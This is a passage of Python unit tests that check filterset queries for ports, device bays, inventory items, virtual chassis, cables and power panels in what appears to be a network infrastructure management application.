def test_name(self):
params = {'name': ['Front Port 1', 'Front Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [PortTypeChoices.TYPE_8P8C, PortTypeChoices.TYPE_110_PUNCH]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': [ColorChoices.COLOR_RED, ColorChoices.COLOR_GREEN]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class RearPortTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = RearPort.objects.all()
filterset = RearPortFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
rear_ports = (
RearPort(device=devices[0], name='Rear Port 1', label='A', type=PortTypeChoices.TYPE_8P8C, color=ColorChoices.COLOR_RED, positions=1, description='First'),
RearPort(device=devices[1], name='Rear Port 2', label='B', type=PortTypeChoices.TYPE_110_PUNCH, color=ColorChoices.COLOR_GREEN, positions=2, description='Second'),
RearPort(device=devices[2], name='Rear Port 3', label='C', type=PortTypeChoices.TYPE_BNC, color=ColorChoices.COLOR_BLUE, positions=3, description='Third'),
RearPort(device=devices[3], name='Rear Port 4', label='D', type=PortTypeChoices.TYPE_FC, positions=4),
RearPort(device=devices[3], name='Rear Port 5', label='E', type=PortTypeChoices.TYPE_FC, positions=5),
RearPort(device=devices[3], name='Rear Port 6', label='F', type=PortTypeChoices.TYPE_FC, positions=6),
)
RearPort.objects.bulk_create(rear_ports)
# Cables
Cable(termination_a=rear_ports[0], termination_b=rear_ports[3]).save()
Cable(termination_a=rear_ports[1], termination_b=rear_ports[4]).save()
# Third port is not connected
def test_name(self):
params = {'name': ['Rear Port 1', 'Rear Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [PortTypeChoices.TYPE_8P8C, PortTypeChoices.TYPE_110_PUNCH]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': [ColorChoices.COLOR_RED, ColorChoices.COLOR_GREEN]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_positions(self):
params = {'positions': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class DeviceBayTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = DeviceBay.objects.all()
filterset = DeviceBayFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
)
Device.objects.bulk_create(devices)
device_bays = (
DeviceBay(device=devices[0], name='Device Bay 1', label='A', description='First'),
DeviceBay(device=devices[1], name='Device Bay 2', label='B', description='Second'),
DeviceBay(device=devices[2], name='Device Bay 3', label='C', description='Third'),
)
DeviceBay.objects.bulk_create(device_bays)
def test_name(self):
params = {'name': ['Device Bay 1', 'Device Bay 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class InventoryItemTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = InventoryItem.objects.all()
filterset = InventoryItemFilterSet
@classmethod
def setUpTestData(cls):
manufacturers = (
Manufacturer(name='Manufacturer 1', slug='manufacturer-1'),
Manufacturer(name='Manufacturer 2', slug='manufacturer-2'),
Manufacturer(name='Manufacturer 3', slug='manufacturer-3'),
)
Manufacturer.objects.bulk_create(manufacturers)
device_type = DeviceType.objects.create(manufacturer=manufacturers[0], model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
)
Device.objects.bulk_create(devices)
inventory_items = (
InventoryItem(device=devices[0], manufacturer=manufacturers[0], name='Inventory Item 1', label='A', part_id='1001', serial='ABC', asset_tag='1001', discovered=True, description='First'),
InventoryItem(device=devices[1], manufacturer=manufacturers[1], name='Inventory Item 2', label='B', part_id='1002', serial='DEF', asset_tag='1002', discovered=True, description='Second'),
InventoryItem(device=devices[2], manufacturer=manufacturers[2], name='Inventory Item 3', label='C', part_id='1003', serial='GHI', asset_tag='1003', discovered=False, description='Third'),
)
for i in inventory_items:
i.save()
child_inventory_items = (
InventoryItem(device=devices[0], name='Inventory Item 1A', parent=inventory_items[0]),
InventoryItem(device=devices[1], name='Inventory Item 2A', parent=inventory_items[1]),
InventoryItem(device=devices[2], name='Inventory Item 3A', parent=inventory_items[2]),
)
for i in child_inventory_items:
i.save()
def test_name(self):
params = {'name': ['Inventory Item 1', 'Inventory Item 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_part_id(self):
params = {'part_id': ['1001', '1002']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_asset_tag(self):
params = {'asset_tag': ['1001', '1002']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_discovered(self):
# TODO: Fix boolean value
params = {'discovered': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'discovered': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_parent_id(self):
parent_items = InventoryItem.objects.filter(parent__isnull=True)[:2]
params = {'parent_id': [parent_items[0].pk, parent_items[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_manufacturer(self):
manufacturers = Manufacturer.objects.all()[:2]
params = {'manufacturer_id': [manufacturers[0].pk, manufacturers[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'manufacturer': [manufacturers[0].slug, manufacturers[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_serial(self):
params = {'serial': 'ABC'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'serial': 'abc'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
class VirtualChassisTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = VirtualChassis.objects.all()
filterset = VirtualChassisFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], vc_position=1),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[0], vc_position=2),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[1], vc_position=1),
Device(name='Device 4', device_type=device_type, device_role=device_role, site=sites[1], vc_position=2),
Device(name='Device 5', device_type=device_type, device_role=device_role, site=sites[2], vc_position=1),
Device(name='Device 6', device_type=device_type, device_role=device_role, site=sites[2], vc_position=2),
)
Device.objects.bulk_create(devices)
virtual_chassis = (
VirtualChassis(name='VC 1', master=devices[0], domain='Domain 1'),
VirtualChassis(name='VC 2', master=devices[2], domain='Domain 2'),
VirtualChassis(name='VC 3', master=devices[4], domain='Domain 3'),
)
VirtualChassis.objects.bulk_create(virtual_chassis)
Device.objects.filter(pk=devices[1].pk).update(virtual_chassis=virtual_chassis[0])
Device.objects.filter(pk=devices[3].pk).update(virtual_chassis=virtual_chassis[1])
Device.objects.filter(pk=devices[5].pk).update(virtual_chassis=virtual_chassis[2])
def test_domain(self):
params = {'domain': ['Domain 1', 'Domain 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_master(self):
masters = Device.objects.all()
params = {'master_id': [masters[0].pk, masters[2].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'master': [masters[0].name, masters[2].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_name(self):
params = {'name': ['VC 1', 'VC 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class CableTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Cable.objects.all()
filterset = CableFilterSet
@classmethod
def setUpTestData(cls):
sites = (
Site(name='Site 1', slug='site-1'),
Site(name='Site 2', slug='site-2'),
Site(name='Site 3', slug='site-3'),
)
Site.objects.bulk_create(sites)
tenants = (
Tenant(name='Tenant 1', slug='tenant-1'),
Tenant(name='Tenant 2', slug='tenant-2'),
Tenant(name='Tenant 3', slug='tenant-3'),
)
Tenant.objects.bulk_create(tenants)
racks = (
Rack(name='Rack 1', site=sites[0]),
Rack(name='Rack 2', site=sites[1]),
Rack(name='Rack 3', site=sites[2]),
)
Rack.objects.bulk_create(racks)
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], rack=racks[0], position=1),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[0], rack=racks[0], position=2),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[1], rack=racks[1], position=1),
Device(name='Device 4', device_type=device_type, device_role=device_role, site=sites[1], rack=racks[1], position=2),
Device(name='Device 5', device_type=device_type, device_role=device_role, site=sites[2], rack=racks[2], position=1),
Device(name='Device 6', device_type=device_type, device_role=device_role, site=sites[2], rack=racks[2], position=2),
)
Device.objects.bulk_create(devices)
interfaces = (
Interface(device=devices[0], name='Interface 1', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[0], name='Interface 2', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[1], name='Interface 3', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[1], name='Interface 4', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[2], name='Interface 5', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[2], name='Interface 6', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[3], name='Interface 7', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[3], name='Interface 8', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[4], name='Interface 9', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[4], name='Interface 10', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[5], name='Interface 11', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[5], name='Interface 12', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
)
Interface.objects.bulk_create(interfaces)
console_port = ConsolePort.objects.create(device=devices[0], name='Console Port 1')
console_server_port = ConsoleServerPort.objects.create(device=devices[0], name='Console Server Port 1')
# Cables
Cable(termination_a=interfaces[1], termination_b=interfaces[2], label='Cable 1', type=CableTypeChoices.TYPE_CAT3, tenant=tenants[0], status=LinkStatusChoices.STATUS_CONNECTED, color='aa1409', length=10, length_unit=CableLengthUnitChoices.UNIT_FOOT).save()
Cable(termination_a=interfaces[3], termination_b=interfaces[4], label='Cable 2', type=CableTypeChoices.TYPE_CAT3, tenant=tenants[0], status=LinkStatusChoices.STATUS_CONNECTED, color='aa1409', length=20, length_unit=CableLengthUnitChoices.UNIT_FOOT).save()
Cable(termination_a=interfaces[5], termination_b=interfaces[6], label='Cable 3', type=CableTypeChoices.TYPE_CAT5E, tenant=tenants[1], status=LinkStatusChoices.STATUS_CONNECTED, color='f44336', length=30, length_unit=CableLengthUnitChoices.UNIT_FOOT).save()
Cable(termination_a=interfaces[7], termination_b=interfaces[8], label='Cable 4', type=CableTypeChoices.TYPE_CAT5E, tenant=tenants[1], status=LinkStatusChoices.STATUS_PLANNED, color='f44336', length=40, length_unit=CableLengthUnitChoices.UNIT_FOOT).save()
Cable(termination_a=interfaces[9], termination_b=interfaces[10], label='Cable 5', type=CableTypeChoices.TYPE_CAT6, tenant=tenants[2], status=LinkStatusChoices.STATUS_PLANNED, color='e91e63', length=10, length_unit=CableLengthUnitChoices.UNIT_METER).save()
Cable(termination_a=interfaces[11], termination_b=interfaces[0], label='Cable 6', type=CableTypeChoices.TYPE_CAT6, tenant=tenants[2], status=LinkStatusChoices.STATUS_PLANNED, color='e91e63', length=20, length_unit=CableLengthUnitChoices.UNIT_METER).save()
Cable(termination_a=console_port, termination_b=console_server_port, label='Cable 7').save()
def test_label(self):
params = {'label': ['Cable 1', 'Cable 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_length(self):
params = {'length': [10, 20]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_length_unit(self):
params = {'length_unit': CableLengthUnitChoices.UNIT_FOOT}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_type(self):
params = {'type': [CableTypeChoices.TYPE_CAT3, CableTypeChoices.TYPE_CAT5E]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_status(self):
params = {'status': [LinkStatusChoices.STATUS_CONNECTED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'status': [LinkStatusChoices.STATUS_PLANNED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
def test_color(self):
params = {'color': ['aa1409', 'f44336']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_rack(self):
racks = Rack.objects.all()[:2]
params = {'rack_id': [racks[0].pk, racks[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
params = {'rack': [racks[0].name, racks[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
def test_site(self):
site = Site.objects.all()[:2]
params = {'site_id': [site[0].pk, site[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
params = {'site': [site[0].slug, site[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
def test_tenant(self):
tenant = Tenant.objects.all()[:2]
params = {'tenant_id': [tenant[0].pk, tenant[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'tenant': [tenant[0].slug, tenant[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_termination_types(self):
params = {'termination_a_type': 'dcim.consoleport'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'termination_b_type': 'dcim.consoleserverport'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_termination_ids(self):
interface_ids = Cable.objects.values_list('termination_a_id', flat=True)[:3]
params = {
'termination_a_type': 'dcim.interface',
'termination_a_id': list(interface_ids),
}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
class PowerPanelTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerPanel.objects.all()
filterset = PowerPanelFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
power_panels = (
PowerPanel(name='Power Panel 1', site=sites[0], location=locations[0]),
PowerPanel(name='Power Panel 2', site=sites[1], location=locations[1]),
PowerPanel(name='Power Panel 3', site=sites[2], location=locations[2]),
)
PowerPanel.objects.bulk_create(power_panels)
def test_name(self):
params = {'name': ['Power Panel 1', 'Power Panel 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class PowerFeedTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerFeed.objects.all()
filterset = PowerFeedFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
